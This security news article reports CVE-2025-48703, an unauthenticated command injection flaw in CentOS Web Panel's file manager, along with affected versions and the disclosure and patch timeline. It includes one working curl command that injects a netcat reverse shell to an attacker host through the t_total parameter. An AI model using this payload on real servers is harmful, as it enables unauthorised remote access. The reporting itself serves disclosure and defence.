A critical security vulnerability in CentOS Web Panel (CWP) has been discovered that allows unauthenticated remote attackers to execute arbitrary commands on affected servers.
The flaw, tracked as CVE-2025-48703, affects one of the most widely used free web hosting control panels, with over 200,000 instances identified globally through Shodan searches.
Summary
1. CentOS Web Panel's file management system fails to verify user credentials, allowing attackers to access restricted endpoints by simply removing user identifiers from URLs.
2. The t_total parameter lacks input sanitization, enabling arbitrary shell command execution through command substitution syntax in chmod system calls.
3. Combining both flaws allows unauthenticated attackers to execute commands with user privileges using simple curl requests and reverse shell payloads.
4. Affects 200,000+ CWP instances worldwide running versions 0.9.8.1204/0.9.8.1188, with CVE-2025-48703 patched in version 0.9.8.1205 released June 2025.Authentication Bypass & Command Injection Flaws
The vulnerability stems from improper authentication verification in CWP’s file management system.
Security researcher Maxime Rinaudo discovered that the user panel’s file permission change functionality fails to properly validate user credentials.
When legitimate users modify file permissions through the web interface, the system generates HTTP POST requests to /cwp_30776ec647a8f390/myuser/myuser/index.php?module=filemanager&acc=changePerm.
However, attackers can bypass authentication entirely by removing user identifiers from the URL path.
A malicious request can be crafted as simple as: POST /myuser/index.php?module=filemanager&acc=changePerm without any authentication cookies or session tokens.
The only requirement is knowledge of a valid non-root username created within the CWP admin interface. The vulnerable request structure uses multipart form data containing parameters like fileName, currentPath, and critically, the t_total parameter that specifies file permissions.
This authentication bypass affects CWP versions 0.9.8.1204 and 0.9.8.1188 running on CentOS 7 systems. The second component of this vulnerability chain involves command injection through the t_total parameter.
This parameter, intended to set file permission modes for the chmod system command, lacks proper input sanitization. Attackers can inject arbitrary shell commands using command substitution syntax.
When the server processes permission changes, it executes: chmod 644 “/home/myuser/.bashrc” through the system shell.
By manipulating the t_total parameter with payloads like $(arbitrary_command) or backtick notation, attackers achieve remote code execution with the privileges of the target user account.
The exploitation chain can be demonstrated using curl:
curl -kis ‘https://target:2083/username/index.php?module=filemanager&acc=changePerm’ –data ‘fileName=.bashrc¤tPath=/home/username&t_total=nc attacker_ip 9999 -e /bin/bash’.
This payload establishes a reverse shell connection, granting attackers interactive access to the compromised system.
| Risk Factors | Details |
| Affected Products | CentOS Web Panel versions 0.9.8.1204 and 0.9.8.1188 running on CentOS 7 systems |
| Impact | Remote Code Execution (RCE) |
| Exploit Prerequisites | – Knowledge of valid non-root username created in CWP- Network access to CWP service (typically port 2083)- Basic HTTP client capabilities (curl, browser, etc.) |
| CVSS 3.1 Score | Likely 9.0 or higher |
Widespread Impact and Metasploit Integration
CentOS Web Panel serves as a free alternative to commercial solutions like cPanel and Plesk, managing essential services including Apache/NGINX web servers, MySQL/MariaDB databases, email systems, and DNS configurations.
The vulnerability’s impact is amplified by CWP’s global adoption across dedicated servers and VPS hosting environments.
Security researchers have already begun developing automated exploitation tools. A Metasploit framework module request (#20344) has been submitted to the rapid7/metasploit-framework repository, indicating the severity of the vulnerability and its potential for widespread exploitation.
The proof-of-concept code demonstrates reliable exploitation against vulnerable instances accessible on port 2083.
CWP developers responded promptly after responsible disclosure on May 13, 2025. CVE-2025-48703 was assigned on May 23, and a security patch was released in version 0.9.8.1205 during June 2025.
Organizations running CWP should immediately upgrade to the patched version and audit their systems for potential compromise indicators, including unexpected network connections and unauthorized file modifications.
The vulnerability’s simplicity and the availability of working exploits make it a significant threat to unpatched CWP installations worldwide.
Investigate live malware behavior, trace every step of an attack, and make faster, smarter security decisions -> Try ANY.RUN now
.webp?w=100&resize=100,70&ssl=1 "Top 10 Best Fraud Prevention Companies in 2025")
